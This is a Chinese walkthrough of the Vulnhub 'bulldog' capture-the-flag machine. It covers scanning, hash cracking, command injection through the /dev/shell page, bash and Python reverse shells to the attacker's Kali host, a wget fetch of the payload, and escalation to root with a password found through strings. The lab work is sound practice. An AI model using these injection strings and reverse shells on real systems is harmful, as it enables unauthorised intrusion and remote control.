配置:
VirtualBox运行靶机bulldog,网卡设置为Host-only;
VMware下运行kali作为攻击机,网卡设置为桥接模式Vritual box Host-only
Kali:192.168.56.102
bulldog:192.168.56.103
netdiscover -r 192.168.56.0/24
发现靶机IP:192.168.56.103
nmap -T4 -A -v -p- 192.168.56.103
开放了23、80、8080三个端口,发现ssh服务和web服务
dirsearch扫描下目录
访问/dev发现一个shell,但目前没登录还不能使用
查看/dev源代码发现
将Sarah的mad5值解码得到bulldoglover
访问/admin成功登录,提示没有权限
Linux提权
访问之前发现的/dev/shell
显示可以执行命令但只可以执行以上命令,尝试用&进行绕过
kali启动监听
nc -lvnp 4444
在/dev/shell输入
ls &&echo "bash -i >& /dev/tcp/192.168.56.102/4444 0>&1" | bash
拿到shell
cat /etc/passwd
cd /home/bulldogadmin
查看包括隐藏文件的全部文件
ls -la
查看.hiddenadmindirectory文件, 有note和customPermissionApp
note提示django用户有时有root权限
cat打开customPermissionApp文件都是乱码,用strings打开
strings customPermissionApp
发现密码:SUPERultimatePASSWORDyouCANTget
sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。
用python调用本地的shell命令,利用python pty模块的shell来进行交互
python -c 'import pty;pty.spawn("/bin/sh")'
sudo su
输入密码拿到root权限
读取flag文件
另一种shell反弹方法:
在Kali上用python搭建一个简单HTTP服务器
python -m SimpleHTTPServer 80
shell脚本python-shell.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
把shell放到搭建的网站目录下
在192.168.56.103/dev/shell执行以下命令
pwd&wget http://192.168.56.102/python-shell.py
在kali监听
nc -lvnp 4444
/dev/shell下继续执行反弹脚本
pwd&python python-shell.py
kali得到shell

Vulnhub--bulldog相关推荐

  1. vulnhub bulldog

    配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置 ...

  2. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  3. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  4. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  5. 【Bulldog】靶场记录

    前言: 漏洞复现有点乏味并且时效性不强,所以我就开始下载vulnhub上的靶场进行练习,但是操作自己是了解的,就是想不到这种方法,还是靶场练习的太少了,所以本人要坚持练习靶场,然后把练习过程记录下来, ...

  6. vulnhub——Bulldog1

    攻击机:kali linux 目标靶机:Bulldog1(可在vulnhub中搜索下载) 目录 壹 信息收集 one 查看kali的IP地址 ​two 主机发现 three 端口扫描 贰 渗透测试 o ...

  7. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  8. bulldog靶机练习思路详解

    下载靶机,在虚拟机中打开 下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 主机扫描nmap,发现目标主机与其开放的端口 在浏览器打开网站,只 ...

  9. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  10. (Vulnhub练习)--Bulldog1渗透实战

    (Vulnhub练习)–Bulldog1渗透实战 下载地址 http://www.vulnhub.com/entry/bulldog-1,211/ 文章转载 靶机渗透测试实战(三)--Bulldog1 ...

最新文章

  1. 联发科mtk手机处理器怎么样_5G手机价格将再探新低!联发科天玑700芯片发布:入门级5G处理器...
  2. 黄聪:主机宝安装wordpress注意事项
  3. python显示时间且更新_python显示当前时间
  4. java基础总结06-常用api类-BigDecimal-精确计算
  5. Python内置函数(28)——hash
  6. PHP的威胁函数与PHP代码审计
  7. 数据库系统概念第六版课后习题答案-第一章
  8. Houdini11:材质
  9. ai怎么调界面大小_Adobe Illustrator(Ai)怎么改变页面大小,快捷键是什么?
  10. Sublime 如何替换换行符
  11. ArcEngine10 ecp 授权
  12. BLE传输速率以及抓包工具
  13. 人工智能的顶会有哪些
  14. iphone系统架构以及各层提供的主要服务
  15. 【正点原子FPGA连载】第三十一章RTC实时时钟数码管显示实验 -摘自【正点原子】新起点之FPGA开发指南_V2.1
  16. 前后加编码_如何不加思考地编码?
  17. 55个常用的JavaScript网页脚本
  18. Python爬虫(上)
  19. 2016百度之星 - 测试赛 1002 列变位法解密 (模拟)
  20. Mysql 数据库网题笔记

热门文章

  1. 史上讲解最好的Docker教程,从入门到精通(建议收藏的教程)
  2. 一根网线实现电脑远程登录树莓派
  3. 图像风格迁移【老版】
  4. xctf攻防世界 MISC高手进阶区 saleae
  5. xch-sboot单体服务架子
  6. 【Unity3D】使用 FBX 格式的外部模型 ( 向 Unity 中添加 FBX 模型 | 向 Scene 场景中添加 FBX 模型 | 3D 物体渲染 | 3D 物体材质设置 )
  7. iOS Code Signing 学习笔记转写
  8. 【笔记】Android桌面角标Badge官方文档和兼容性解决
  9. 1183: 【入门】判断能否构成三角形
  10. Unity 接入百度AI - 植物识别